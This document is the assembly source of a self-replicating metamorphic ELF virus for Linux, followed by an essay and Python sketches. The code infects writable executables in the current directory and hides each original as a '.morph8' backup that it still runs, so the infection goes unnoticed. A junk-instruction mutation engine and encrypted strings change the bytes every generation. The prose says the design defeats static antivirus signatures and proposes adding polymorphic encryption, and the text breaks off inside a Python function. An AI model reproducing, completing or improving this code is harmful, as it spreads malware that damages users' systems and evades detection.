    mov rax, SYS_lseek
    syscall
    ret

sys_access:
    mov rax, SYS_access
    syscall
    ret

sys_getdents64:
    mov rax, SYS_getdents64
    syscall
    ret

sys_exit:
    mov rax, SYS_exit
    syscall

; validate ELF executable target
is_elf:
    push r12
    push r13

    mov rsi, O_RDONLY
    xor rdx, rdx
    call sys_open
    test rax, rax
    js .not_elf
    mov r12, rax

    mov rdi, r12
    mov rsi, elf_header
    mov rdx, 64
    call sys_read

    push rax
    mov rdi, r12
    call sys_close
    pop rax

    cmp rax, 64
    jl .not_elf

    ; validate ELF magic
    mov rsi, elf_header
    cmp dword [rsi], 0x464C457F
    jne .not_elf

    ; 64-bit only
    cmp byte [rsi + 4], 2
    jne .not_elf

    ; executable or shared object
    mov ax, [rsi + 16]
    cmp ax, 2
    je .valid
    cmp ax, 3
    jne .not_elf

.valid:
    mov rax, 1
    jmp .done

.not_elf:
    xor rax, rax

.done:
    pop r13
    pop r12
    ret

; string utilities

basename:                           ; extract filename from path
    mov rax, rdi
    mov rsi, rdi
.find_last_slash:
    mov bl, [rsi]
    cmp bl, 0
    je .done
    cmp bl, '/'
    jne .next_char
    inc rsi
    mov rax, rsi
    jmp .find_last_slash
.next_char:
    inc rsi
    jmp .find_last_slash
.done:
    ret

strlen:
    xor rcx, rcx
.strlen_loop:
    cmp byte [rdi + rcx], 0
    je .strlen_done
    inc rcx
    jmp .strlen_loop
.strlen_done:
    mov rax, rcx
    ret

strcpy:
    mov rax, rdi
.cp_loop:
    mov bl, [rsi]
    mov [rdi], bl
    inc rdi
    inc rsi
    cmp bl, 0
    jne .cp_loop
    ret

strcmp:
    push rdi
    push rsi
.cmp_loop:
    mov al, [rdi]
    mov bl, [rsi]
    cmp al, bl
    jne .not_equal
    test al, al
    jz .equal
    inc rdi
    inc rsi
    jmp .cmp_loop
.equal:
    xor rax, rax
    jmp .done
.not_equal:
    movzx rax, al
    movzx rbx, bl
    sub rax, rbx
.done:
    pop rsi
    pop rdi
    ret

strstr:
    mov r8, rdi
    mov r9, rsi

    mov al, [r9]
    test al, al
    jz .found

.scan:
    mov bl, [r8]
    test bl, bl
    jz .not_found

    cmp al, bl
    je .check_match
    inc r8
    jmp .scan

.check_match:
    mov r10, r8
    mov r11, r9

.match_loop:
    mov al, [r11]
    test al, al
    jz .found

    mov bl, [r10]
    test bl, bl
    jz .not_found

    cmp al, bl
    jne .next_pos

    inc r10
    inc r11
    jmp .match_loop

.next_pos:
    inc r8
    jmp .scan

.found:
    mov rax, r8
    ret

.not_found:
    xor rax, rax
    ret

; PRNG
get_random:
    mov eax, [signme]
    mov edx, eax
    shr edx, 1
    xor eax, edx
    mov edx, eax
    shr edx, 2
    xor eax, edx
    mov [signme], eax
    ret

get_range:                          ; random in range 0 to ecx-1
    call get_random
    xor edx, edx
    div ecx
    mov eax, edx
    ret

; decrypt string with indexed key
d_strmain:
    push rax
    push rbx
    push rcx
    push rdx
    push r8

    mov r8, xor_keys
    add r8, rcx
    mov al, [r8]

    mov rcx, rdx

    ; clear dest buffer (rep stosb stores AL, so preserve the key byte)
    push rax
    push rdi
    push rcx
    mov rdi, rsi
    mov rcx, rdx
    xor al, al
    rep stosb
    pop rcx
    pop rdi
    pop rax

.d_loop:
    test rcx, rcx
    jz .d_done

    mov bl, [rdi]
    xor bl, al
    mov [rsi], bl

    inc rdi
    inc rsi
    dec rcx
    jmp .d_loop

.d_done:
    pop r8
    pop rdx
    pop rcx
    pop rbx
    pop rax
    ret

; decrypt all strings at runtime
d_str:
    push rdi
    push rsi
    push rdx
    push rcx

    mov rdi, touc
    mov rsi, touch_cmd_fmt
    mov rdx, 9
    mov rcx, 0
    call d_strmain

    mov rdi, cmhd
    mov rsi, chmod_cmd_fmt
    mov rdx, 12
    mov rcx, 1
    call d_strmain

    mov rdi, tchh
    mov rsi, touch_chmod_fmt
    mov rdx, 12
    mov rcx, 2
    call d_strmain

    mov rdi, exec
    mov rsi, exec_cmd_fmt
    mov rdx, 5
    mov rcx, 3
    call d_strmain

    mov rdi, cpcm
    mov rsi, cp_cmd_fmt
    mov rdx, 9
    mov rcx, 4
    call d_strmain

    mov rdi, vxxe
    mov rsi, vxx_str
    mov rdx, 4
    mov rcx, 5
    call d_strmain

    mov rdi, hidd
    mov rsi, hidden_prefix
    mov rdx, 8
    mov rcx, 6
    call d_strmain

    pop rcx
    pop rdx
    pop rsi
    pop rdi
    ret

; 4 variants
spawn_junk:
    push rbx
    push rcx
    push rdx
    push r8

    mov r8, rdi               ; dst buffer

    call get_random
    and eax, 3                ; 4 variants

    cmp eax, 0
    je .variant_0
    cmp eax, 1
    je .variant_1
    cmp eax, 2
    je .variant_2
    jmp .variant_3

.variant_0:
    ; push rax,rbx; xchg rax,rbx; xchg rax,rbx; pop rbx,rax
    mov byte [r8], 0x50
    mov byte [r8+1], 0x53
    mov byte [r8+2], 0x48
    mov byte [r8+3], 0x87
    mov byte [r8+4], 0xC3
    mov byte [r8+5], 0x48
    mov byte [r8+6], 0x87
    mov byte [r8+7], 0xC3
    mov byte [r8+8], 0x5B
    mov byte [r8+9], 0x58
    jmp .done

.variant_1:
    ; push rcx,rdx; xchg rcx,rdx; xchg rcx,rdx; pop rdx,rcx
    mov byte [r8], 0x51
    mov byte [r8+1], 0x52
    mov byte [r8+2], 0x48
    mov byte [r8+3], 0x87
    mov byte [r8+4], 0xCA
    mov byte [r8+5], 0x48
    mov byte [r8+6], 0x87
    mov byte [r8+7], 0xCA
    mov byte [r8+8], 0x5A
    mov byte [r8+9], 0x59
    jmp .done

.variant_2:
    ; push rax,rcx; xchg rax,rcx; xchg rax,rcx; pop rcx,rax
    mov byte [r8], 0x50
    mov byte [r8+1], 0x51
    mov byte [r8+2], 0x48
    mov byte [r8+3], 0x87
    mov byte [r8+4], 0xC1
    mov byte [r8+5], 0x48
    mov byte [r8+6], 0x87
    mov byte [r8+7], 0xC1
    mov byte [r8+8], 0x59
    mov byte [r8+9], 0x58
    jmp .done

.variant_3:
    ; push rbx,rdx; xchg rbx,rdx; xchg rbx,rdx; pop rdx,rbx
    mov byte [r8], 0x53
    mov byte [r8+1], 0x52
    mov byte [r8+2], 0x48
    mov byte [r8+3], 0x87
    mov byte [r8+4], 0xD3
    mov byte [r8+5], 0x48
    mov byte [r8+6], 0x87
    mov byte [r8+7], 0xD3
    mov byte [r8+8], 0x5A
    mov byte [r8+9], 0x5B

.done:
    pop r8
    pop rdx
    pop rcx
    pop rbx
    ret

; file I/O
read_f:
    push r12
    push r13
    push r14
    push r15

    mov r15, rsi            ; save buffer pointer

    mov rax, SYS_open
    mov rsi, O_RDONLY
    xor rdx, rdx
    syscall
    test rax, rax
    js .error

    mov r12, rax

    mov rax, SYS_fstat
    mov rdi, r12
    sub rsp, 144
    mov rsi, rsp
    syscall
    test rax, rax
    js .close_e

    mov r13, [rsp + 48]     ; file size from stat
    add rsp, 144

    ; bounds check
    cmp r13, 65536
    jle .size_ok
    mov r13, 65536
.size_ok:
    test r13, r13
    jz .empty

    xor r14, r14            ; bytes read cnt

.read_loop:
    mov rax, SYS_read
    mov rdi, r12
    mov rsi, r15
    add rsi, r14            ; offset into buffer
    mov rdx, r13
    sub rdx, r14            ; remaining bytes to read
    jz .read_done
    syscall

    test rax, rax
    jle .read_done          ; EOF or error
    add r14, rax
    cmp r14, r13
    jl .read_loop

.read_done:
    mov rax, SYS_close
    mov rdi, r12
    syscall

    mov rax, r14            ; return bytes read
    jmp .done

.empty:
    mov rax, SYS_close
    mov rdi, r12
    syscall
    xor rax, rax

.done:
    pop r15
    pop r14
    pop r13
    pop r12
    ret

.close_e:
    add rsp, 144
    mov rax, SYS_close
    mov rdi, r12
    syscall

.error:
    mov rax, -1
    pop r15
    pop r14
    pop r13
    pop r12
    ret

write_f:
    push rbp
    mov rbp, rsp
    push r12
    push r13
    push r14
    push r15

    mov r12, rdi            ; filename
    mov r13, rsi            ; buffer
    mov r14, rdx            ; size

    ; validate inputs
    test r12, r12
    jz .write_er
    test r13, r13
    jz .write_er
    test r14, r14
    jz .write_s

    mov rdi, r12
    mov rsi, O_WRONLY | O_CREAT | O_TRUNC
    mov rdx, 0755o
    call sys_open
    cmp rax, 0
    jl .write_er
    mov r12, rax            ; fd

    xor r15, r15            ; bytes written cnt

.write_lp:
    mov rdi, r12
    mov rsi, r13
    add rsi, r15            ; offset into buffer
    mov rdx, r14
    sub rdx, r15            ; remaining bytes
    jz .write_c
    call sys_write
    JUNK

    test rax, rax
    jle .r_close
    add r15, rax
    cmp r15, r14
    jl .write_lp

.write_c:
    mov rdi, r12
    call sys_close

.write_s:
    xor rax, rax            ; success
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbp
    ret

.r_close:
    mov rdi, r12
    call sys_close
.write_er:
    mov rax, -1
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbp
    ret

; instruction generator
trace_op:
    ; bounds check
    mov rax, [codelen]
    cmp rsi, rax
    jae .bounds_er

    mov r8, code
    add r8, rsi

    ; instruction size check
    mov rax, [codelen]
    sub rax, rsi
    cmp rax, 3
    jae .rex_xchg
    cmp rax, 2
    jae .write_prefix
    cmp rax, 1
    jae .write_nop

.bounds_er:
    xor eax, eax
    ret

.write_nop:
    mov byte [r8], NOP
    mov eax, 1
    ret

.write_prefix:
    ; validate register (0-3 only)
    cmp dil, 3
    ja .bounds_er

    call get_random
    and eax, 5
    movzx eax, byte [prefixes + rax]
    mov [r8], al

    call get_random
    and eax, 3              ; encodings 0-3: rax,rcx,rdx,rbx
    shl eax, 3
    add eax, 0xC0
    add al, dil
    mov [r8 + 1], al

    mov eax, 2
    ret

.rex_xchg:
    ; generate REX.W XCHG
    cmp dil, 3
    ja .bounds_er

    ; get different register
    call get_random
    and eax, 3
    cmp al, dil
    je .rex_xchg            ; retry if same

    ; build REX.W XCHG r1, r2
    mov byte [r8], REX_W
    mov byte [r8 + 1], XCHG_OP

    ; ModR/M byte
    mov bl, XCHG_BASE
    mov cl, al
    shl cl, 3
    add bl, cl
    add bl, dil
    mov [r8 + 2], bl

    mov eax, 3
    ret

; instruction decoder
trace_jmp:
    push rbx
    push rcx

    cmp rsi, [codelen]
    jae .invalid

    mov r8, code
    mov al, [r8 + rsi]

    ; check for NOP
    cmp al, NOP
    je .ret_1

    ; check MOV+reg
    mov bl, MOV
    add bl, dil
    cmp al, bl
    je .ret_5

    ; check prefix instruction
    mov rbx, prefixes
.check_prefix:
    mov cl, [rbx]
    test cl, cl
    jz .invalid
    cmp cl, al
    je .check_second_byte
    inc rbx
    jmp .check_prefix

.check_second_byte:
    inc rsi
    cmp rsi, [codelen]
    jae .invalid

    mov al, [r8 + rsi]
    cmp al, 0xC0
    jb .invalid
    cmp al, 0xFF
    ja .invalid
    and al, 7
    cmp al, dil
    jne .invalid

.ret_2:
    mov eax, 2
    jmp .done
.ret_1:
    mov eax, 1
    jmp .done
.ret_5:
    mov eax, 5
    jmp .done
.invalid:
    xor eax, eax
.done:
    pop rcx
    pop rbx
    ret

; junk mutation engine
replace_junk:
    push r12
    push r13
    push r14
    push r15

    mov r8, [codelen]
    test r8, r8
    jz .done

    cmp r8, JUNKLEN
    jle .done

    sub r8, JUNKLEN
    mov r9, code
    xor r12, r12

.scan_loop:
    cmp r12, r8
    jae .done

    mov rax, [codelen]
    cmp r12, rax
    jae .done

    ; scan for junk pattern
    movzx eax, byte [r9 + r12]
    cmp al, PUSH
    jb .next_i
    cmp al, PUSH + 3        ; encodings 0-3: rax,rcx,rdx,rbx
    ja .next_i

    ; second byte must be PUSH
    movzx ebx, byte [r9 + r12 + 1]
    cmp bl, PUSH
    jb .next_i
    cmp bl, PUSH + 3
    ja .next_i

    ; check REX.W prefix
    cmp byte [r9 + r12 + 2], REX_W
    jne .next_i

    ; check XCHG opcode
    cmp byte [r9 + r12 + 3], XCHG_OP
    jne .next_i

    ; validate complete sequence
    call validate
    test eax, eax
    jz .next_i

    ; replace with new junk
    call insert

.next_i:
    inc r12
    jmp .scan_loop

.done:
    pop r15
    pop r14
    pop r13
    pop r12
    ret

; validate junk pattern
validate:
    push rbx
    push rcx

    ; extract registers from PUSH
    movzx eax, byte [r9 + r12]
    sub al, PUSH
    mov bl, al              ; reg1

    movzx eax, byte [r9 + r12 + 1]
    sub al, PUSH
    mov cl, al              ; reg2

    ; registers must differ
    cmp bl, cl
    je .invalid

    ; check POP sequence (reversed)
    movzx eax, byte [r9 + r12 + 8]
    sub al, POP
    cmp al, cl
    jne .invalid

    movzx eax, byte [r9 + r12 + 9]
    sub al, POP
    cmp al, bl
    jne .invalid

    mov eax, 1              ; Valid sequence
    jmp .done

.invalid:
    xor eax, eax
.done:
    pop rcx
    pop rbx
    ret

; insert new junk sequence
insert:
    push rdi

    mov rdi, r9
    add rdi, r12
    call spawn_junk

    pop rdi
    ret

;; shell command execution
exec_sh:
    sub rsp, 0x40
    mov qword [rsp], sh_arg0        ; argv[0] -> "sh" string (not the pointer slot)
    mov qword [rsp+8], sh_arg1      ; argv[1] -> "-c"
    mov qword [rsp+16], rdi         ; argv[2] -> command string
    mov qword [rsp+24], 0

    mov rsi, rsp
    xor rdx, rdx

    mov rdi, shell_path
    mov rax, SYS_execve
    syscall
    mov rdi, 1
    call sys_exit

sh_arg0_ptr: dq sh_arg0
sh_arg1_ptr: dq sh_arg1

list:                           ; scan directory for infection targets
    push rbp
    mov rbp, rsp
    push r12
    push r13
    push r14
    push r15

    mov r14, rsi

    mov rdi, current_dir
    mov rsi, O_RDONLY
    mov rdx, 0
    call sys_open
    cmp rax, 0
    jl .list_error
    mov r12, rax

.list_loop:
    mov rdi, r12
    mov rsi, dir_buf
    mov rdx, 4096
    call sys_getdents64
    cmp rax, 0
    jle .list_done          ; 0 = end of directory, negative = error
    mov r13, rax

    xor r15, r15

.list_entry:
    cmp r15, r13
    jge .list_loop

    mov rdi, dir_buf
    add rdi, r15

    mov r8, rdi
    add r8, 16
    movzx rax, word [r8]    ; d_reclen at offset 16

    cmp rax, 19
    jl .list_done           ; bogus d_reclen; abort before push so stack stays balanced
    cmp rax, 4096
    jg .list_done

    push rax                ; saved d_reclen, popped at .skip_entry

    mov r8, rdi
    add r8, 18
    mov cl, [r8]

    cmp cl, 8
    jne .skip_entry

    add rdi, 19

    cmp byte [rdi], '.'
    jne .check_file
    mov r8, rdi
    inc r8
    cmp byte [r8], 0
    je .skip_entry
    mov r8, rdi
    inc r8
    cmp byte [r8], '.'
    je .skip_entry

.check_file:
    push rdi

    mov rdi, r14
    call basename

    mov rsi, rax
    mov rdi, [rsp]
    call strcmp

    pop rdi
    test rax, rax
    jz .chosen_one

    push rdi
    push rsi
    push rbx

    ; Check if filename starts with .morph8
    mov rsi, hidden_prefix
    mov rbx, rdi

.see_hidden:
    mov al, [rbx]
    mov dl, [rsi]
    test dl, dl
    jz .is_hidden       ; End of prefix - it's a hidden file
    cmp al, dl
    jne .not_hidden     ; Mismatch - not hidden
    inc rbx
    inc rsi
    jmp .see_hidden

.is_hidden:
    pop rbx
    pop rsi
    pop rdi
    jmp .skip_entry

.not_hidden:
    pop rbx
    pop rsi
    pop rdi

    mov rsi, vxx_str
    call strstr
    test rax, rax
    jnz .found_vxx

    push rdi
    mov rsi, X_OK
    call sys_access
    pop rdi
    cmp rax, 0
    jne .not_exec

    push rdi
    mov rsi, W_OK
    call sys_access
    pop rdi
    cmp rax, 0
    jne .not_exec

    jmp .e_conditions

.not_exec:
    jmp .skip_entry

.e_conditions:
    sub rsp, 256
    mov r8, rsp
    push rdi

    mov rdi, r8
    mov rsi, [rsp]
    call hidden_name

    mov rax, SYS_open
    mov rdi, r8
    mov rsi, O_RDONLY
    xor rdx, rdx
    syscall

    pop rdi
    test rax, rax
    js .not_exists

    ; Hidden file exists - been here, skip it
    push rdi
    mov rdi, rax
    call sys_close
    pop rdi
    add rsp, 256
    jmp .skip_entry

.not_exists:
    add rsp, 256

    ; Check if we're trying to infect ourselves
    push rdi                ; Save current filename

    ; Get our own basename
    mov rdi, bin_name
    call basename
    mov rsi, rax

    mov rdi, [rsp]
    call strcmp

    pop rdi

    test rax, rax
    jz .skip_self_infection ; If filenames match, skip infection

    ; Check if file is a valid ELF executable before infection
    push rdi
    call is_elf
    pop rdi
    test rax, rax
    jz .skip_non_elf        ; Not a valid ELF, skip infection

    push rdi
    call implant
    pop rdi
    jmp .skip_entry

.skip_self_infection:
    ; Don't infect ourselves, just skip
    jmp .skip_entry

.skip_non_elf:
    ; Not a valid ELF executable, skip infection
    jmp .skip_entry

.chosen_one:
    push rdi
    mov rsi, rdi
    mov rdi, orig_exec_name
    call strcpy
    pop rdi
    jmp .skip_entry

.found_vxx:
    mov byte [vierge], 0

.skip_entry:
    pop rax
    add r15, rax
    jmp .list_entry

.list_done:
    mov rdi, r12
    call sys_close

.list_error:
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbp
    ret

implant:                        ; infect target executable
    push r12
    push r13
    mov r12, rdi

    ; Validate input
    test r12, r12
    jz .d_skip

    push r12
    mov rdi, r12
    call strlen
    pop r12
    mov r13, rax

    ; Check filename length bounds
    cmp r13, 200
    jg .d_skip
    test r13, r13
    jz .d_skip

    ; Check if we have code to embed
    mov rax, [codelen]
    test rax, rax
    jz .d_skip
    cmp rax, 65536
    jg .d_skip

    ; 1: Create hidden backup of original file
    sub rsp, 768
    mov rdi, rsp
    add rdi, 512             ; Use third section for hidden name
    mov rsi, r12
    call hidden_name

    ; Check if hidden backup already exists
    mov rax, SYS_open
    mov rdi, rsp
    add rdi, 512             ; hidden name
    mov rsi, O_RDONLY
    xor rdx, rdx
    syscall

    test rax, rax
    js .fallback             ; File doesn't exist, create backup

    mov rdi, rax
    call sys_close
    jmp .infect_orgi         ; Proceed to reinfect with new mutations

.fallback:
    mov rdi, rsp             ; Use first section for command
    mov rsi, cp_cmd_fmt
    mov rdx, r12             ; original filename
    mov rcx, rsp
    add rcx, 512             ; hidden name
    call sprintf_two_args
    mov rdi, rsp
    call system_call

    ; Set permissions on hidden file
    mov rdi, rsp
    add rdi, 256             ; Use second section for chmod command
    mov rsi, chmod_cmd_fmt
    mov rdx, rsp
    add rdx, 512             ; hidden name
    call sprintf
    mov rdi, rsp
    add rdi, 256
    call system_call

.infect_orgi:
    add rsp, 768

    ; 2: Replace original file with viral code
    mov rdi, r12             ; original filename
    mov rsi, code
    mov rdx, [codelen]
    call write_f

.d_skip:
    pop r13
    pop r12
    ret

;; payload execution
execute:                        ; virus payload
    JUNK

    mov rdi, msg_cat
    call strlen
    mov rdx, rax

    mov rdi, 1
    mov rsi, msg_cat
    call sys_write
    JUNK
    ret

hidden_name:                    ; create .morph8
    push rsi
    push rdi
    push rbx
    push rcx

    mov rbx, rsi
    mov rcx, hidden_prefix

.check_prefix:
    mov al, [rbx]
    mov dl, [rcx]
    test dl, dl
    jz .already_one          ; it matches
    cmp al, dl
    jne .add_prefix          ; Mismatch
    inc rbx
    inc rcx
    jmp .check_prefix

.already_one:
    ; File already has .morph8 prefix, just copy it
    jmp .cp_file

.add_prefix:
    ; Add .morph8 prefix
    mov byte [rdi], '.'
    mov byte [rdi + 1], 'm'
    mov byte [rdi + 2], 'o'
    mov byte [rdi + 3], 'r'
    mov byte [rdi + 4], 'p'
    mov byte [rdi + 5], 'h'
    mov byte [rdi + 6], '8'

    add rdi, 7

.cp_file:
    mov al, [rsi]
    test al, al
    jz .done
    mov [rdi], al
    inc rsi
    inc rdi
    jmp .cp_file

.done:
    mov byte [rdi], 0

    pop rcx
    pop rbx
    pop rdi
    pop rsi
    ret

sprintf:                        ; basic string formatting
    push r9
    push r10

    mov r8, rdi                 ; dst
    mov r9, rsi                 ; string
    mov r10, rdx                ; arg

.scan_format:
    mov al, [r9]
    test al, al
    jz .done

    cmp al, '%'
    je .found_percent

    mov [r8], al
    inc r8
    inc r9
    jmp .scan_format

.found_percent:
    inc r9
    mov al, [r9]
    cmp al, 's'
    je .cp_arg
    cmp al, '%'
    je .cp_percent

    ; Unknown format, copy literally
    mov byte [r8], '%'
    inc r8
    mov [r8], al
    inc r8
    inc r9
    jmp .scan_format

.cp_percent:
    mov byte [r8], '%'
    inc r8
    inc r9
    jmp .scan_format

.cp_arg:
    push r9
    mov r9, r10
.cp_loop:
    mov al, [r9]
    test al, al
    jz .cp_done
    mov [r8], al
    inc r8
    inc r9
    jmp .cp_loop

.cp_done:
    pop r9
    inc r9
    jmp .scan_format

.done:
    mov byte [r8], 0
    pop r10
    pop r9
    ret

sprintf_two_args:               ; string with two args
    push rbp
    mov rbp, rsp
    push r10
    push r11
    push r12

    mov r8, rdi                 ; dst buffer
    mov r9, rsi                 ; string
    mov r10, rdx                ; 1 arg
    mov r11, rcx                ; 2 arg
    xor r12, r12                ; arg cnt

.cp_loop:
    mov al, [r9]
    test al, al
    je .done
    cmp al, '%'
    je .handle_format
    mov [r8], al
    inc r8
    inc r9
    jmp .cp_loop

.handle_format:
    inc r9
    mov al, [r9]
    cmp al, 's'
    je .cp_string
    cmp al, '%'
    je .cp_percent

    mov byte [r8], '%'
    inc r8
    mov [r8], al
    inc r8
    inc r9
    jmp .cp_loop

.cp_percent:
    mov byte [r8], '%'
    inc r8
    inc r9
    jmp .cp_loop

.cp_string:
    cmp r12, 0
    je .use_arg1
    mov rdx, r11                ; second arg
    jmp .do_cp
.use_arg1:
    mov rdx, r10                ; first arg
.do_cp:
    inc r12

    push r9
    push rdx
    mov r9, rdx
.str_cp:
    mov al, [r9]
    test al, al
    je .str_done
    mov [r8], al
    inc r8
    inc r9
    jmp .str_cp

.str_done:
    pop rdx
    pop r9
    inc r9
    jmp .cp_loop

.done:
    mov byte [r8], 0
    pop r12
    pop r11
    pop r10
    pop rbp
    ret

system_call:                    ; execute shell
    push r12
    mov r12, rdi

    mov rax, SYS_fork
    syscall
    test rax, rax
    jz .child_process
    js .error

    mov rdi, rax
    xor rsi, rsi
    xor rdx, rdx
    xor r10, r10
    mov rax, SYS_wait4
    syscall

    pop r12
    ret

.child_process:
    sub rsp, 32
    mov qword [rsp], sh_arg0
    mov qword [rsp+8], sh_arg1
    mov qword [rsp+16], r12
    mov qword [rsp+24], 0

    mov rax, SYS_execve
    mov rdi, shell_path
    mov rsi, rsp
    xor rdx, rdx
    syscall

    mov rax, SYS_exit
    mov rdi, 1
    syscall

.error:
    pop r12
    ret

;;  entry point
_start:
    ; anti goes here
    ;avant:
    call d_str   ; Decrypt all

    mov rax, SYS_getrandom
    mov rdi, signme
    mov rsi, 4
    xor rdx, rdx
    syscall

    mov al, [vierge_val]
    mov [vierge], al

    pop rdi                  ; argc
    mov rsi, rsp             ; rsp now points at argv[0]
    push rsi                 ; keep &argv[0] on the stack

    mov rdi, bin_name
    mov rsi, [rsp]           ; &argv[0]
    mov rsi, [rsi]           ; argv[0] string
    call strcpy

    mov rdi, [rsp]
    mov rdi, [rdi]           ; argv[0]
    call basename
    mov rdi, orig_exec_name
    mov rsi, rax
    call strcpy

    call execute

    pop rsi
    push rsi

    ; Read our own code
    mov rdi, [rsi]
    call read_code

    mov rax, [codelen]
    test rax, rax
    jz .skip_mutation

    ; Apply mutations
    call replace_junk

.skip_mutation:
    pop rsi
    push rsi
    mov rdi, current_dir
    mov rsi, [rsi]
    call list

    cmp byte [vierge], 1
    jne .exec_theone

    cmp byte [orig_exec_name], 0
    jne .orig_name_ok
    mov rdi, bin_name
    call basename
    mov rdi, orig_exec_name
    mov rsi, rax
    call strcpy

.orig_name_ok:
    ; Build hidden name for the chosen one
    sub rsp, 512
    mov rdi, rsp
    add rdi, 256
    mov rsi, orig_exec_name
    call hidden_name

    ; Create touch command
    mov rdi, rsp             ; Use first half for command
    mov rsi, touch_cmd_fmt
    mov rdx, rsp
    add rdx, 256             ; Point to hidden name
    call sprintf
    mov rdi, rsp
    call system_call

    ; Create chmod command
    mov rdi, rsp             ; Reuse first half for command
    mov rsi, touch_chmod_fmt
    mov rdx, rsp
    add rdx, 256             ; Point to hidden name
    call sprintf
    mov rdi, rsp
    call system_call
    add rsp, 512

.exec_theone:
    mov rdi, bin_name
    mov rsi, hidden_prefix
    call strstr
    test rax, rax
    jnz .killme

    ; Build hidden name and execute it
    sub rsp, 512
    mov rdi, rsp
    add rdi, 256             ; Use second half for hidden name
    mov rsi, orig_exec_name
    call hidden_name

    ; Create exec command
    mov rdi, rsp             ; Use first half for command
    mov rsi, exec_cmd_fmt
    mov rdx, rsp
    add rdx, 256             ; Point to hidden name
    call sprintf
    mov rdi, rsp
    call system_call
    add rsp, 512

.killme:
    ; Clean up any leftovers
    call zero0ut

    pop rsi
    xor rdi, rdi
    mov rax, SYS_exit
    syscall

zero0ut:
    mov rdi, code
    mov rcx, 65536
    xor al, al
    rep stosb

    mov rdi, dir_buf
    mov rcx, 4096
    xor al, al
    rep stosb

    mov rdi, temp_buf
    mov rcx, 1024
    xor al, al
    rep stosb

    ret

read_code:
    mov rsi, code
    call read_f
    test rax, rax
    js .error

    mov [codelen], rax
    ret

.error:
    mov qword [codelen], 0
    ret

extract_v:
    push r12
    push r13
    push r14

    mov rdi, bin_name
    mov rsi, code
    call read_f
    test rax, rax
    js .err_v

    cmp rax, 65536
    jle .size_ok
    mov rax, 65536

.size_ok:
    mov [codelen], rax
    jmp .ext_done

.err_v:
    mov qword [codelen], 0
    xor rax, rax

.ext_done:
    pop r14
    pop r13
    pop r12
    ret

This Is Only the Foundation

The code above exists to demonstrate core mechanisms, not to claim coverage of a complete system. Metamorphic and polymorphic engines go far deeper than what is shown here. What we have now is a starting point — sufficient to prove the concept, but still far from full-spectrum capability.

Currently, the mutation engine only processes its own defined junk patterns. It does not touch arbitrary instruction sequences. It also only supports basic register replacement so far. Features such as instruction reordering, control-flow rewriting, and logical substitution are absent.

Mutation patterns are hard-coded. There is no adaptive behavior. Propagation logic is also kept simple.
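As a rough model of what that junk pass does, here is a minimal Python sketch (not the engine itself; the function names simply mirror the assembly labels above). It recognizes the 10-byte push/push/xchg/xchg/pop/pop pattern and overwrites each occurrence with a freshly randomized variant:

```python
import random

PUSH, POP, REX_W, XCHG = 0x50, 0x58, 0x48, 0x87

def spawn_junk(rng):
    # Pick two distinct register encodings 0-3 (rax, rcx, rdx, rbx).
    r1, r2 = rng.sample(range(4), 2)
    modrm = 0xC0 | (r1 << 3) | r2
    # push r1; push r2; xchg; xchg; pop r2; pop r1  -> a 10-byte no-op
    return bytes([PUSH + r1, PUSH + r2,
                  REX_W, XCHG, modrm,
                  REX_W, XCHG, modrm,
                  POP + r2, POP + r1])

def replace_junk(code, rng):
    # Scan for 10-byte junk blocks and overwrite each with a fresh
    # variant, mirroring the validate/insert pass of the engine.
    buf = bytearray(code)
    i = 0
    while i + 10 <= len(buf):
        b = buf[i:i + 10]
        r1, r2 = b[0] - PUSH, b[1] - PUSH
        if (0 <= r1 <= 3 and 0 <= r2 <= 3 and r1 != r2
                and b[2] == REX_W and b[3] == XCHG
                and b[8] == POP + r2 and b[9] == POP + r1):
            buf[i:i + 10] = spawn_junk(rng)
            i += 10
        else:
            i += 1
    return bytes(buf)
```

The byte positions of real instructions never move; only the contents of the already-reserved junk slots change, which is exactly why the engine stays simple and stable.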


Each generation becomes different at the byte level, yet does the same things. What changes is the implementation, not the behavior. This is exactly why it shatters static signatures.
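That equivalence can be checked mechanically. The sketch below is a hypothetical Python mini-interpreter covering only the push/pop/xchg opcodes the junk variants use; it symbolically executes two of the variants from the listing and confirms each is a net no-op even though their bytes differ:

```python
def junk_effect(block):
    # Symbolically execute push / pop / REX.W xchg and return the net
    # register map plus leftover stack; a well-formed junk block must
    # leave both unchanged (behavioral conservation).
    regs = {i: f"v{i}" for i in range(4)}   # encodings 0-3: rax, rcx, rdx, rbx
    stack = []
    i = 0
    while i < len(block):
        op = block[i]
        if 0x50 <= op <= 0x53:                      # push reg
            stack.append(regs[op - 0x50]); i += 1
        elif 0x58 <= op <= 0x5B:                    # pop reg
            regs[op - 0x58] = stack.pop(); i += 1
        elif op == 0x48 and block[i + 1] == 0x87:   # REX.W xchg r/m64, r64
            modrm = block[i + 2]
            a, b = (modrm >> 3) & 7, modrm & 7
            regs[a], regs[b] = regs[b], regs[a]
            i += 3
        else:
            raise ValueError(f"unexpected opcode {op:#x}")
    return regs, stack

# Two of the engine's four variants, byte-for-byte from the listing above.
VARIANT_0 = bytes([0x50, 0x53, 0x48, 0x87, 0xC3, 0x48, 0x87, 0xC3, 0x5B, 0x58])
VARIANT_1 = bytes([0x51, 0x52, 0x48, 0x87, 0xCA, 0x48, 0x87, 0xCA, 0x5A, 0x59])
```

Different bytes, identical effect: this is the invariant every mutation must preserve.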

As the VX repeatedly reinfects, the code drifts further from its original form. The hidden backup mechanism helps it stay low-profile. The original file continues to run normally, allowing the VX to persist quietly.
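For illustration, the backup-naming rule implemented by hidden_name in the listing reduces to a few lines of Python (a sketch, assuming the same .morph8 marker):

```python
HIDDEN_PREFIX = ".morph8"

def hidden_name(filename):
    # Mirror of the engine's hidden_name routine: prepend the marker
    # prefix unless the name already carries it, so each target gets
    # at most one hidden backup.
    if filename.startswith(HIDDEN_PREFIX):
        return filename
    return HIDDEN_PREFIX + filename
```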

Of course, these capabilities come at a cost: CPU and memory consumption, and doubled storage usage due to backups.

— Possibilities —

If you want to push further, you will need a larger pattern library, smarter runtime self-analysis, clean syscall abstraction for cross-platform support, and deeper code analysis with control-flow and data-flow mapping.

Combine it with polymorphism: encrypted payload + deformable code structure creates a layered system. Surface randomization, internal concealment, final behavior invariant. The adversary will find almost no stable anchor points.
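A toy model of that extra polymorphic layer, sketched in Python under the assumption of a single-byte XOR key like the string cipher in the listing: every generation re-encrypts the payload under a fresh key, so the stored bytes change while decryption always recovers identical behavior.

```python
import os

def make_generation(payload):
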